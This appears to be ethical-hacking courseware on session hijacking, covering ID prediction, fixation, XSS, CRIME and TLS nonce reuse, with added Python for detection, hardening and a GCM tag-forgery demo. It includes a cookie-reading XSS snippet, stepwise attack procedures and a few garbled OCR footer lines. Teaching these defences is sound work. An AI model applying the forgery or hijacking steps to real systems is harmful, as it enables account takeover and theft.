In a spoofing attack, an attacker pretends to be another user or machine (victim) to gain access. Instead of taking over an existing active session, the attacker initiates a new session using the victim's stolen credentials. Simple IP spoofing is easy to perform and is useful in various attack methods. To create new raw packets, the attacker must have root access on the machine. However, to establish a spoofed connection using this session hijacking technique, an attacker must know the sequence numbers used by a target machine. IP spoofing forces the attacker to forecast the NSN. When an attacker uses blind hijacking to send a command, they cannot view the response.
In the case of IP spoofing without a session hijack, guessing the sequence number is unnecessary because no currently open session exists with that IP address. In a session hijack, the traffic returns to the attacker only if source routing is used. Source routing is a process that allows the sender to specify the route to be taken by an IP packet to the destination. The attacker performs source routing and then sniffs the traffic as it passes by the attacker. In session spoofing, captured authentication credentials are used to establish a session. In contrast, active hijacking eclipses a pre-existing session. As a result of this attack, a legitimate user may lose access or the normal functionality of their established Telnet session because an attacker hijacks the session and acts with the user's privileges. Because most authentication mechanisms are enforced only at the initiation of a session, the attacker can gain access to a target machine without authentication while a session is in progress.
Another method is to use source routed IP packets. This type of MITM attack allows an attacker to become a part of the target-host conversation by deceptively guiding IP packets to pass through their system.

Session hijacking is the process of taking over an existing active session. An attacker relies on a legitimate user to make a connection and authenticate. Session hijacking is more difficult than IP address spoofing. In session hijacking, John (an attacker) would seek to insert himself into a session that James (a legitimate user) already had set up with \\Mail. John would wait until James establishes a session, displace James from the established session by some means, such as a DoS attack, and then pick up the session as though he were James. Subsequently, John would send a scripted set of packets to \\Mail and observe the responses. For this purpose, John needs to know the sequence number in use when he hijacked the session. To calculate the sequence number, he must know the ISN and the number of packets involved in the exchange process.

Successful session hijacking is difficult without the use of known tools and is only possible when several factors are under the attacker's control. Knowledge of the ISN is the least of John's challenges. For instance, John needs a method to displace James from the active session as well as a method to know the exact status of James's session at the moment that James is displaced. Both these tasks require John to have far more knowledge and control over the session than would normally be possible.

However, IP address spoofing attacks can only be successful if an attacker uses IP addresses for authentication. They cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. In the same manner, IP address spoofing or session hijacking is not possible if the session uses encryption methods such as Secure Sockets Layer (SSL) or Point-to-Point Tunneling Protocol (PPTP). Consequently, the attacker cannot participate in the key exchange.
Figure 11.5: Spoofing attack (James, the victim, logs on to the server with his credentials; John, the attacker, predicts the sequence and kills James' connection)
Module Flow: 01 Session Hijacking Concepts | 02 Application Level Session Hijacking | Network Level Session Hijacking | 05 Countermeasures
Application Level Session Hijacking

In a session hijacking attack, a session token is stolen or a valid session token is predicted to gain unauthorized access. A session token can be compromised in various ways:
- Session sniffing
- Predictable session token
- Man-in-the-middle attack
- Man-in-the-browser attack
- Cross-site scripting (XSS) attack
- Cross-site request forgery attack
- Session replay attack
- Session fixation attack
- CRIME attack
- Forbidden attack

In application level hijacking, the attacker obtains the session IDs to gain control over an existing session or to create a new unauthorized application session. This section discusses application level session hijacking and various methods to compromise the session token, such as session sniffing and the use of predictable session tokens.
In application level session hijacking, an attacker steals or predicts a valid session to gain unauthorized access to a web server. Usually, network level and application level session hijacking occur together because a successful network level session hijack provides an attacker with ample information to perform application level session hijacking. Application level session hijacking relies on HTTP sessions.

An attacker implements various techniques such as stealing, guessing, and brute forcing to obtain a valid session ID, which helps in acquiring control over a valid user's session while it is in progress.

- Stealing: An attacker can also use sniffing of session IDs or memory contents of either the user's system or the server. The attacker uses tools such as Wireshark or SteelCentral Packet Analyzer to sniff the traffic between the client and server to extract the session IDs from the packets.
- Guessing: An attacker attempts to guess the session IDs by observing session variables. In the case of session hijacking, the range of session ID values that can be guessed is limited. Thus, guessing techniques are effective only when servers use weak or flawed session-ID generation mechanisms.
- Brute forcing: In the brute-force technique, an attacker obtains session IDs by attempting all possible permutations of session ID values until finding one that works. An attacker using a digital subscriber line (DSL) can generate up to 1,000 session IDs per second. This technique is most useful when the algorithm that produces session IDs is non-random.
http://www.mysite.com/view/VW30422101520803
http://www.mysite.com/view/VW30422101522507

Figure 11.7: Brute-forcing attack on the session ID of a user
As shown in the above figure, a legitimate user connects to a server with session ID VW30422101522507. Employing various combinations such as VW30422101518909 and VW30422101520803, an attacker attempts to brute force the session ID in the hope of eventually arriving at the correct session ID. Once the attacker obtains the correct session ID, they gain complete access to the user's data and can perform operations on behalf of the legitimate user. A predicted range of values for a session ID is very small.

A session token can be compromised in various ways:
- Predictable session token
- Man-in-the-middle (MITM) attack
- Man-in-the-browser attack
- Cross-site scripting (XSS) attack
- Cross-site request forgery attack
- Session replay attack
- Session fixation attack
- Session donation attack
- CRIME attack
- Forbidden attack
Compromising Session IDs Using Sniffing and by Predicting Session Token

- Compromising Session IDs Using Sniffing: An attacker uses a sniffer to capture a valid session token or session ID. The attacker then uses the valid token session to gain unauthorized access to the web server.
- Compromising Session IDs by Predicting Session Token: Attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze the variable sections of session IDs to determine the existence of a pattern. The analysis is performed manually or using various cryptanalytic tools. Attackers collect a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant.
Compromising Session IDs Using Sniffing

A web server identifies a user's connection through a unique session ID (also known as a session token). The web server sends a session token to the client browser after the successful authentication of client login. Usually, a session token comprises a string of variable width that is useful in various ways, such as in the header of an HTTP requisition (cookie), in a URL, or in the body of an HTTP requisition.

An attacker uses packet sniffing tools such as Wireshark and SteelCentral Packet Analyzer to intercept the HTTP traffic between a victim and web server. The attacker then analyzes the data in the captured packets to identify valuable information such as session IDs and passwords. Once the session ID is determined, the attacker masquerades as the victim and sends the session ID to the web server before the victim does. The attacker uses the valid token session to gain unauthorized access to the web server. In this manner, the attacker takes control over an existing legitimate session.

Figure 11.8: Prediction of session ID by sniffing
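The observable side effect of a sniffed or replayed token is that one session ID turns up from two different clients. The following detection logic is an added example, not code from the courseware: it runs over constructed web-server log lines in an assumed "timestamp client_ip user_agent session_id path" layout and reports a session ID that a second client fingerprint presents within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic); the layout is assumed:
# <ISO timestamp> <client ip> <user agent> <session id> <path>
SAMPLE_LOG = """\
2019-08-18T16:00:20Z 10.0.0.15 Firefox/68 VW30422101522507 /view/inbox
2019-08-18T16:00:41Z 10.0.0.15 Firefox/68 VW30422101522507 /view/message/12
2019-08-18T16:01:05Z 10.0.0.99 curl/7.64 VW30422101522507 /view/inbox
2019-08-18T16:01:09Z 10.0.0.15 Firefox/68 VW30422101522507 /view/settings
2019-08-18T16:02:30Z 10.0.0.23 Chrome/76 VW30422101518909 /view/inbox
"""


def parse_line(line):
    """Split one log line into its fields; the user agent is a single token here."""
    ts, ip, ua, sid, path = line.split(maxsplit=4)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "fp": (ip, ua),  # client fingerprint the session should stay bound to
        "sid": sid,
        "path": path,
    }


def find_shared_sessions(log_text, window=timedelta(minutes=5)):
    """Return one alert per (session id, pair of fingerprints) whenever the same
    session id is presented by two different clients within `window`.
    A legitimate user does not normally switch IP and browser mid-session
    within a few minutes, so this is the trace a sniffed or replayed token
    leaves in the server's own logs."""
    recent = defaultdict(list)  # sid -> [(ts, fp), ...] inside the window
    reported = set()            # (sid, frozenset({fp1, fp2})) already alerted
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        # Forget observations of this session id that fell out of the window.
        recent[ev["sid"]] = [(t, f) for t, f in recent[ev["sid"]]
                             if ev["ts"] - t <= window]
        for t, f in recent[ev["sid"]]:
            key = (ev["sid"], frozenset({f, ev["fp"]}))
            if f != ev["fp"] and key not in reported:
                reported.add(key)
                alerts.append({
                    "sid": ev["sid"],
                    "first_seen_from": f,
                    "also_used_from": ev["fp"],
                    "seconds_apart": int((ev["ts"] - t).total_seconds()),
                    "at": ev["ts"].isoformat(),
                })
        recent[ev["sid"]].append((ev["ts"], ev["fp"]))
    return alerts


if __name__ == "__main__":
    for a in find_shared_sessions(SAMPLE_LOG):
        print(f"{a['at']} session {a['sid']} used from {a['first_seen_from']} "
              f"and {a['also_used_from']} {a['seconds_apart']}s apart")
```

The sample yields exactly one alert: VW30422101522507 is seen from the Firefox client and then, 45 seconds later, from a curl client at another address.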
Compromising Session IDs by Predicting Session Token

A session ID is tagged as proof of an authenticated session established between a user and web server. Thus, if an attacker can guess or predict the session ID of the user, fraudulent activity is possible. Session prediction enables an attacker to bypass the authentication schema of an application. Usually, attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze a variable section of session IDs to determine the existence of a pattern. This analysis is performed either manually or by using various cryptanalytic tools.

An attacker collects a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant. First, the attacker collects some valid session IDs that are useful in identifying authenticated users. The attacker then studies the session ID structure, the information used to generate it, and the algorithm used by the web application to secure it. From these findings, the attacker can predict the session ID.

Attackers can also guess session IDs by using a brute-force technique, in which they generate and test different session ID values until they succeed in gaining access to the application.
How to Predict a Session Token

- Most web servers use custom algorithms or a predefined pattern to generate session IDs.
- An attacker guesses the unique session value or deduces the session ID to hijack the session.
- Captures: An attacker captures session IDs such as http://www.certifiedhacker.com/view/JBEX18082019152020 and http://www.certifiedhacker.com/view/JBEX18082019160020 and analyzes the pattern.
- Predicts: At 16:25:55 on August 23, 2019 the attacker can successfully predict the session ID http://www.certifiedhacker.com/view/JBEX23082019162555.
- Session IDs may be embedded in a hidden field in a form, which is submitted to the HTTP's POST command.
- Session IDs may be embedded in cookies on the client's local machine.
An attacker guesses the unique session value or deduces the session ID to hijack the session. As shown in the below figure, an attacker first captures several session IDs and analyzes the pattern.

http://www.certifiedhacker.com/view/JBEX18082019160020 (Constant | Date | Time)

Figure 11.9: Sample sessions captured by an attacker

On analyzing the pattern, at 16:25:55 on August 23, 2019, the attacker successfully predicts the session ID, as shown in the below figure.

http://www.certifiedhacker.com/view/JBEX23082019162555 (Constant | Date | Time)

Figure 11.10: Session ID predicted by the attacker

Now, the attacker can mount an attack through the following steps.
- The attacker acquires the current session ID and connects to the web application.
- The attacker implements a brute-force technique or calculates the next session ID.
- The attacker modifies the current value in the cookie/URL/hidden form field and assumes the next user's identity.
Compromising Session IDs Using Man-in-the-Middle Attack

- The man-in-the-middle attack is used to intrude into an existing connection between systems and to intercept the messages being exchanged.
- After the interception of the TCP connection, an attacker can read, modify, and insert fraudulent data.
- In the case of an HTTP transaction, the TCP connection between the client and the server is the target.
A man-in-the-middle (MITM) attack is used to intrude into an existing connection between systems and to intercept messages being transmitted. In this attack, attackers use different techniques and split a TCP connection into two: a client-to-attacker connection and an attacker-to-server connection. After the successful interception of a TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication. In the case of an HTTP transaction, the TCP connection between the client and server is the target.

Figure 11.11: Prediction of session ID using a man-in-the-middle (MITM) attack
Compromising Session IDs Using Man-in-the-Browser Attack

- Its main objective is to cause financial deceptions by manipulating transactions of Internet banking systems.

A man-in-the-browser attack is similar to an MITM attack. The difference between the two is that a man-in-the-browser attack uses a Trojan horse to intercept and manipulate calls between a browser and its security mechanisms or libraries. An attacker positions a previously installed Trojan between the browser and its security mechanism, and the Trojan can modify web pages and transaction content or insert additional transactions. All of the Trojan's activities are invisible to both the user and the web application.
The main objective of this attack is financial theft by manipulating transactions made using Internet banking systems. A man-in-the-browser attack can succeed even in the presence of security mechanisms such as SSL, public key infrastructure (PKI), and two-factor authentication because all the expected controls and security mechanisms would seem to function normally.

Steps to Perform Man-in-the-Browser Attack:
- The Trojan first infects the computer's software (OS or application).
- The Trojan installs malicious code (extension files) and saves it in the browser configuration.
- After the user restarts the browser, the malicious code in the form of extension files is loaded.
- The extension files register a handler for every visit to a webpage.
- When a page is loaded, the extension matches its URL with a list of known sites targeted for attack.
- The user logs in securely to the website.
- The extension registers a button event handler when a specific page load with a specific pattern is detected and compares it with its targeted list.
- When the user clicks on the button, the extension uses the Document Object Model (DOM) interface and extracts all the data from all form fields and modifies the values.
- The browser sends the form and modified values to the server.
- The server receives the modified values but cannot distinguish between the original and modified values.
- After the server performs the transaction, a receipt is generated.
- Now, the browser receives the receipt for the modified transaction.
- The browser displays the receipt with the original details.
- The user believes that the original transaction was received by the server without any interception.
Compromising Session IDs Using Client-side Attacks

- Cross-Site Scripting (XSS): XSS enables attackers to inject malicious client-side scripts into the web pages viewed by other users.
- Malicious JavaScript Codes: A malicious script does not generate any warning but captures session tokens in the background and sends them to the attacker.
- Trojans: A Trojan changes the proxy settings to send all the sessions through the attacker's machine.
Client-side attacks target vulnerabilities in client applications that interact with a malicious server or process malicious data. Depending on the nature of the vulnerabilities, an attacker can exploit an application by sending an email with a malicious link or otherwise tricking a user into visiting a malicious website. Vulnerable client-side applications include an unprotected Java Runtime Environment, websites, and browsers; of these, browsers are the major target. Client-side attacks occur when clients establish connections with malicious servers and process potentially harmful data from them. If no interaction occurs between the client and server, then there is no scope for a client-side attack. One such example is running a File Transfer Protocol (FTP) client without establishing a connection to an FTP server. In the case of instant messaging, the application is configured in such a way that it makes clients log in to a remote server, making it susceptible to client-side attacks. The following client-side attacks can be used to compromise session IDs.
- Cross-site scripting (XSS): XSS enables attackers to inject malicious client-side scripts into web pages viewed by other users.
- Malicious JavaScript codes: An attacker can embed in a web page a malicious script that does not generate any warning but captures session tokens in the background and sends them to the attacker.
- Trojans: A Trojan horse can change the proxy settings in the user's browser to send all sessions through an attacker's machine.
Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack

- An attacker sends a crafted link to the victim with malicious JavaScript; when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker.
A cross-site script attack is a client-side attack in which the attacker compromises a session token by using malicious code or programs. This type of attack occurs when a dynamic web page receives malicious data from the attacker and executes it on the user's system. Websites that create dynamic pages do not have control over how the clients read their output. Thus, attackers can insert a malicious JavaScript, VBScript, ActiveX, Hypertext Markup Language (HTML), or Flash applet into a vulnerable dynamic page. That page then executes the script on the user's machine and collects personal information of the user, steals cookies, redirects users to unexpected web pages, or executes any malicious code on the user's system.

As shown in the below figure, a user first establishes a valid session with a server. An attacker sends a crafted link to the victim with JavaScript. When the user clicks on the link, the JavaScript runs automatically and performs the instructions set by the attacker. The result displays the current session ID of the user. Using the same technique, the attacker can create specific JavaScript code that fetches the user's session ID:

<SCRIPT>alert(document.cookie);</SCRIPT>

Thereafter, the attacker uses the stolen session ID to establish a valid session with the server.
Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack

- The Cross-site Request Forgery (CSRF) attack exploits the victim's active session with a trusted site to perform malicious activities.
Compromising Session IDs Using Session Replay Attacks

- In a session replay attack, the attacker listens to the conversation between the user and the server and captures the authentication token of the user.
- Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server.

In a session replay attack, the attacker captures the authentication token of a user by listening to a conversation between the user and server. Once the authentication token is captured, the attacker replays the authentication request to the server with the captured authentication token to dodge the server; consequently, they gain unauthorized access to the server. A session replay attack involves the following steps.
- The user establishes a connection with the web server.
- The server asks the user for authentication information as identity proof.
- The user sends authentication tokens to the server. In this step, an attacker captures the authentication token of the user by eavesdropping on the conversation between the user and server.
- Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server.
Figure 11.15: Prediction of session ID using session replay attack
Compromising Session IDs Using Session Fixation
Web session security prevents an attacker from intercepting, brute forcing, or predicting the session ID issued by a web server to a user's browser as proof of an authenticated session. However, this approach ignores the possibility of the attacker issuing a session ID to the user's browser, forcing it to use the chosen session ID. This type of attack is called a session fixation attack because an attacker fixes the user's session ID in advance, instead of generating it randomly at the time of login.

The attacker performs a session fixation attack to hijack a valid user session. The attacker takes advantage of limitations in web-application session ID management. Web applications allow the user to authenticate themselves using an existing session ID, instead of generating a new session ID. In this type of attack, the attacker provides a legitimate web-application session ID and lures the victim to use it. If the victim's browser uses that session ID, then the attacker can hijack the user-validated session because the attacker is already aware of the session ID used by the victim.

A session fixation attack is a kind of session hijack. However, instead of stealing the session established between a user and web server after the user logs in, a session fixation attack fixes an established session on the user's browser; thus, the attack is initiated before the user logs in.

An attacker uses various techniques to perform a session fixation attack:
- Session token in the URL argument
- Session token in a hidden form field
- Session ID in a cookie

The attacker must choose a technique based on how the target web application uses session tokens. The attacker exploits the vulnerability of a server that allows a user to use a fixed
session ID. Then, the attacker provides a valid session ID to a victim and lures him to authenticate themselves using that session ID. A session fixation attack has the following three phases.
- Session set-up phase: In this phase, the attacker first obtains a legitimate session ID by establishing a connection with the target web server. Few web servers support the idle session time-out feature. If the target web server supports this feature, the attacker needs to send requests repeatedly to keep the established trap session ID alive.
- Fixation phase: In this phase, the attacker introduces the session ID to the victim's browser, thereby fixing the session.
- Entrance phase: In this phase, the attacker waits for the victim to log in to the target web server using the trap session ID and then enters the victim's session.

A session fixation attack is performed through the following steps.
- First, the attacker establishes a legitimate connection with the target web server.
- The target web server (e.g., http://citibank.com/) issues a session ID, say 0D6441FEA4496C2, to the attacker.
- The attacker sends a link with the established session ID, say http://citibank.com/?SID=0D6441FEA4496C2, to the victim and lures the victim to click on it to access the website.
- The victim clicks on the link, believing it to be a legitimate link sent by the bank. This opens the server's login page in the victim's browser for SID=0D6441FEA4496C2.
- The web server checks that the session ID 0D6441FEA4496C2 is already established and is in an active state; hence, it does not create a new session.
- Finally, the victim enters their login credentials in the login script, and the server grants them access to the bank account.
- At this point, knowing the session ID, the attacker can also access the victim's bank account via http://citibank.com/?SID=0D6441FEA4496C2.

Because the session ID is set by the attacker before the user logged in, the user can be said to have logged into the attacker's session.
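The three phases above, and the cookie-reading XSS snippet earlier in this section, can both be exercised against a tiny in-memory session store. The following Python is an added example, not the courseware's code; it assumes a framework-free server where requests are plain function calls, and shows the fixation-prone store beside a hardened one that re-issues the session ID at login and sets the cookie with HttpOnly, Secure and SameSite=Strict.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Session:
    user: Optional[str] = None   # None until a login succeeds on this ID
    authenticated: bool = False


class FixableSessionStore:
    """Fixation-prone behaviour from the text: a SID the client presents
    (from ?SID= in the URL, a hidden field or a cookie) is honoured if the
    server already knows it, and login keeps that same SID, so a planted
    'trap' SID becomes the victim's authenticated session."""

    def __init__(self):
        self.sessions: Dict[str, Session] = {}

    def get_or_create(self, client_sid: Optional[str]) -> str:
        """Reuse a known SID supplied by the client, else issue a fresh one."""
        if client_sid in self.sessions:
            return client_sid
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session()
        return sid

    def login(self, client_sid: Optional[str], user: str) -> str:
        sid = self.get_or_create(client_sid)
        self.sessions[sid].user = user
        self.sessions[sid].authenticated = True
        return sid   # unchanged across login: this is the flaw


class HardenedSessionStore(FixableSessionStore):
    """Fix: login always discards the pre-login SID and issues a new one,
    so whoever knew the old SID (the attacker who planted it) holds nothing."""

    def login(self, client_sid: Optional[str], user: str) -> str:
        if client_sid in self.sessions:
            del self.sessions[client_sid]   # the trap SID dies at login
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session(user=user, authenticated=True)
        return sid

    @staticmethod
    def set_cookie_header(sid: str) -> str:
        # Attributes that blunt the client-side theft described earlier:
        # HttpOnly hides the cookie from document.cookie (the XSS snippet),
        # Secure keeps it off plaintext HTTP, and SameSite=Strict stops
        # cross-site requests from carrying it.
        return f"Set-Cookie: SID={sid}; HttpOnly; Secure; SameSite=Strict; Path=/"


def is_authenticated(store: FixableSessionStore, sid: str) -> bool:
    s = store.sessions.get(sid)
    return s is not None and s.authenticated


def run_fixation_scenario(store_cls):
    """Replay the three phases from the text against a store and return
    (attacker_holds_authenticated_session, victim_sid_after_login)."""
    store = store_cls()
    trap_sid = store.get_or_create(None)          # set-up: attacker obtains a SID
    store.get_or_create(trap_sid)                 # fixation: victim's browser presents it
    victim_sid = store.login(trap_sid, "victim")  # victim logs in on that SID
    # entrance: the attacker presents the trap SID after the victim's login
    return is_authenticated(store, trap_sid), victim_sid


if __name__ == "__main__":
    for cls in (FixableSessionStore, HardenedSessionStore):
        hijacked, _ = run_fixation_scenario(cls)
        print(f"{cls.__name__}: attacker's trap SID authenticated = {hijacked}")
```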
Session Hijacking Using Proxy Servers

- An attacker lures the victim to click on a bogus link, which looks legitimate but redirects the user to the attacker's server.
- The attacker then forwards the request to the legitimate server on behalf of the victim and serves as a proxy for the entire transaction.
- The attacker captures the session information during the interaction of the legitimate server and the user.
An attacker lures the victim to click on a fake link, which appears legitimate but redirects the user to the attacker's server. The attacker then forwards the request to the legitimate server on behalf of the victim and serves as a proxy for the entire transaction. Acting as a proxy, the attacker captures the session information during the interaction between the legitimate server and user.

Figure 11.17: Session hijacking using proxy servers (Victim; Attacker Server, reallybadguys.com, reached through the link <a href="http://reallybadguys.com/gotcha.php">; Legitimate Server, amazon.com)
Session Hijacking Using CRIME Attack

- Compression Ratio Info-Leak Made Easy (CRIME) is a client-side attack that exploits the vulnerabilities present in the data compression feature of protocols such as SSL/TLS, SPDY, and HTTPS.
- The authentication information obtained from the compressed cookie is used to establish the session anew with the web application.
Compression Ratio Info-Leak Made Easy (CRIME) is a client-side attack that exploits vulnerabilities in the data-compression feature of protocols such as SSL/Transport Layer Security (TLS), SPDY, and HTTP Secure (HTTPS). The possibility of mitigation against HTTPS compression is low, which makes this vulnerability even more dangerous than other compression vulnerabilities.

When two hosts on the Internet establish a connection using HTTPS, a TLS session is established, and the data are transmitted in an encrypted form. Hence, it is difficult for an attacker to read or modify the messages between the two hosts. When a user logs into a web application, authentication data are stored in a cookie. Whenever the browser sends an HTTPS request to the web application, the stored cookie is used for authentication. In this attack, the attacker attempts to access the authentication cookie to hijack the victim's session.

In HTTPS, cookies are compressed using a lossless data compression algorithm (DEFLATE) and then encrypted. Hence, it is difficult for an attacker to obtain the value of the cookie with simple sniffing.

To perform a CRIME attack, an attacker must use social engineering techniques to trick the victim into clicking on a malicious link. When the victim clicks on the malicious link, it either injects malicious code into the victim's system or redirects the victim to a malicious website. If the victim has already established an HTTPS connection with a secured web application, the attacker sniffs the victim's HTTPS traffic using techniques such as ARP spoofing. Through sniffing, the attacker captures the cookie value from the HTTPS messages and sends multiple HTTPS requests to the web application with that cookie prepended with a few random characters. Subsequently, the attacker monitors the traffic between the victim and web application to obtain the compressed and encrypted value of the cookie. After capturing the cookie, the attacker analyzes the cookie length and predicts the actual value of the authentication cookie.

After obtaining the authentication cookie, the attacker impersonates the victim and hijacks the victim's session with the secure web application to steal confidential information such as passwords, social security numbers, and credit card numbers. Attackers use tools such as CrimeCheck to detect whether a web server has TLS or HTTP compression enabled and is thus vulnerable to CRIME attacks.
Session Hijacking Using Forbidden Attack

- A forbidden attack is a type of man-in-the-middle attack.
- It exploits the reuse of a cryptographic nonce during the TLS handshake to hijack HTTPS sessions and discover sensitive information, such as bank account numbers, passwords, and social security numbers.
A forbidden attack is a type of MITM attack that can be executed when a cryptographic nonce is reused while establishing an HTTPS session with a server. According to the TLS specification, these arbitrary pieces of data must be used once. This attack exploits the vulnerability that the TLS implementation incorrectly reuses the same nonce when data are encrypted using the Advanced Encryption Standard-Galois/Counter Mode (AES-GCM) during the TLS handshake. Attackers exploit this vulnerability to perform an MITM attack by generating cryptographic keys used for authentication. Repeating the same nonce during the TLS handshake allows an attacker to monitor and hijack the connection. After hijacking the HTTPS session and bypassing the protection, attackers inject malicious code and forged content into the transmission, such as JavaScript code or web fields that prompt the user to disclose passwords, social security numbers, or other confidential information. A forbidden attack involves the following steps.
- The attacker monitors the connection between the victim and web server and sniffs the nonce from the TLS handshake messages.
- The attacker generates authentication keys using the nonce and hijacks the connection.
- All the traffic between the victim and web server flows through the attacker's machine.
- The attacker injects JavaScript code or web fields into the transmission towards the victim.
- The victim reveals sensitive information such as bank account numbers, passwords, and social security numbers to the attacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
11.19: hijacking
Session
attack
3 forbidden
using
Module8 1412
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
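An added example, not from the courseware, of the algebra the steps above rely on. The GF(2^128) arithmetic and the GHASH tag construction are the real GCM ones; the two AES invocations (the record keystream and the tag mask E_K(J0)) are replaced by SHA-256-derived stand-ins, labelled as such, so the script runs without a crypto library. The key, the reused nonce, the two observed records and the injected content are constructed.

```python
import hashlib

# GF(2^128) in the bit-reflected representation GCM uses (NIST SP 800-38D,
# Algorithm 1). A block is a 128-bit int whose most significant bit is bit 0.
R = 0xE1 << 120
ONE = 1 << 127          # the field element "1"


def gf_mul(x: int, y: int) -> int:
    z, v = 0, x
    for i in range(128):
        if (y >> (127 - i)) & 1:
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1
    return z


def gf_pow(a: int, e: int) -> int:
    result, base = ONE, a
    while e:
        if e & 1:
            result = gf_mul(result, base)
        base = gf_mul(base, base)
        e >>= 1
    return result


def gf_inv(a: int) -> int:
    return gf_pow(a, (1 << 128) - 2)     # a^(2^128 - 2) = a^-1 for a != 0


def gf_sqrt(a: int) -> int:
    return gf_pow(a, 1 << 127)           # squaring is a bijection in characteristic 2


def _blocks(data: bytes):
    for i in range(0, len(data), 16):
        yield int.from_bytes(data[i:i + 16].ljust(16, b"\0"), "big")


def ghash(h: int, aad: bytes, ct: bytes) -> int:
    """Real GCM GHASH: AAD blocks, ciphertext blocks, then the length block."""
    y = 0
    for blk in list(_blocks(aad)) + list(_blocks(ct)):
        y = gf_mul(y ^ blk, h)
    return gf_mul(y ^ (((len(aad) * 8) << 64) | (len(ct) * 8)), h)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class GcmStandIn:
    """GCM with its AES calls replaced by SHA-256 outputs (constructed stand-in,
    so no crypto library is needed). tag = GHASH_H(aad, ct) XOR E_K(J0) is the
    real construction, and that is all the forbidden attack depends on."""

    def __init__(self, key: bytes):
        self.key = key
        self.h = int.from_bytes(hashlib.sha256(b"H" + key).digest()[:16], "big")

    def _mask(self, nonce: bytes) -> int:                 # stands in for E_K(J0)
        return int.from_bytes(hashlib.sha256(b"J0" + self.key + nonce).digest()[:16], "big")

    def _keystream(self, nonce: bytes, n: int) -> bytes:  # stands in for AES-CTR
        out, ctr = b"", 1
        while len(out) < n:
            out += hashlib.sha256(self.key + nonce + ctr.to_bytes(4, "big")).digest()
            ctr += 1
        return out[:n]

    def seal(self, nonce, aad, pt):
        ct = xor(pt, self._keystream(nonce, len(pt)))
        return ct, ghash(self.h, aad, ct) ^ self._mask(nonce)

    def open(self, nonce, aad, ct, tag):
        if ghash(self.h, aad, ct) ^ self._mask(nonce) != tag:
            return None
        return xor(ct, self._keystream(nonce, len(ct)))


# ---- attacker side: needs only two records sealed under the same key and nonce ----

def recover_h(c1: bytes, t1: int, c2: bytes, t2: int) -> int:
    """Two single-block records, same nonce, no AAD:
    t1 ^ t2 = (c1 ^ c2) * H^2, hence H^2 = (t1 ^ t2) / (c1 ^ c2) and H = sqrt(H^2)."""
    diff_c = int.from_bytes(c1, "big") ^ int.from_bytes(c2, "big")
    return gf_sqrt(gf_mul(t1 ^ t2, gf_inv(diff_c)))


def forge_tag(h: int, c1: bytes, t1: int, new_ct: bytes) -> int:
    mask = t1 ^ ghash(h, b"", c1)         # recovers E_K(J0) for the reused nonce
    return ghash(h, b"", new_ct) ^ mask


def demo():
    cipher = GcmStandIn(b"server-record-key")
    nonce = b"\x42" * 12                  # the bug: the same nonce is used twice
    p1 = b"GET /account HTT"              # two 16-byte records sniffed on the wire
    p2 = b"POST /transfer H"
    c1, t1 = cipher.seal(nonce, b"", p1)
    c2, t2 = cipher.seal(nonce, b"", p2)

    h = recover_h(c1, t1, c2, t2)
    keystream = xor(c1, p1)               # known plaintext (a predictable header) leaks the keystream
    injected = b"<script>evil</s>"        # 16 bytes the attacker wants the victim to accept
    c3 = xor(injected, keystream)
    t3 = forge_tag(h, c1, t1, c3)
    return h == cipher.h, cipher.open(nonce, b"", c3, t3)
```

The decryption check in `open` passes for the forged record even though the attacker never learned the key, which is why nonce reuse in GCM is treated as a total loss of integrity rather than a minor weakness.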
Session Hijacking Using Session Donation Attack

In a session donation attack, the attacker donates their own session ID to the target user. In this attack, the attacker first obtains a valid session ID by logging into a service and later feeds the same session ID to the target user. This session ID links the target user to the attacker's account page without disclosing any information to the victim. When the target user clicks on the link and enters their details (username, password, payment details, etc.) in a form, the entered details are linked to the attacker's account. To initiate this attack, the attacker can deliver their session ID using techniques such as cross-site cooking, an MITM attack, and session fixation. The attack works only when the application accepts a session ID supplied by the client (for example, in the URL) instead of using exclusively the IDs it has issued itself. A session donation attack involves the following steps.

▪ First, the attacker logs into a service, establishes a legitimate connection with the target web server, and deletes the stored information.
▪ The target web server (e.g., http://citibank.com/) issues a session ID, say 0D6441FEA4496C2, to the attacker.
▪ The attacker then donates their session ID, say http://citibank.com/?SID=0D6441FEA4496C2, to the victim and lures the victim to click on it to access the website.
▪ The victim clicks on the link, believing it to be a legitimate link sent by the bank. This opens the server's page in the victim's browser with SID=0D6441FEA4496C2.
▪ Finally, the victim enters their information in the page and saves it.

Figure 11.20: Session hijacking using session donation attack
Network level hijacking relies on hijacking transport and Internet protocols used by web applications in the application layer. By attacking network level sessions, the attacker gathers some critical information that is used to attack application level sessions.

The following are different types of network level hijacking:

▪ Blind hijacking
▪ UDP hijacking
▪ TCP/IP hijacking
▪ RST hijacking
▪ Man-in-the-middle: packet sniffer
▪ IP spoofing: source routed packets

Three-way Handshake

Initially, the client-side connection is in the closed state and the server-side in the listening state. The client initiates the connection by sending the initial sequence number (ISN) and setting the SYN flag. The client is now in the SYN-SENT state.
hijack.
If the attacker can fool the server into receiving their spoofed packets and executing them, the attacker is successful in hijacking the session.

Figure 11.21: Three-way handshake (Bob's final segment in the figure: ACK, ACK# 7001, SEQ 4002)

The three-way handshake shown in the above figure involves the following steps.

1. Bob initiates a connection with the server and sends a packet to the server with the SYN flag set.
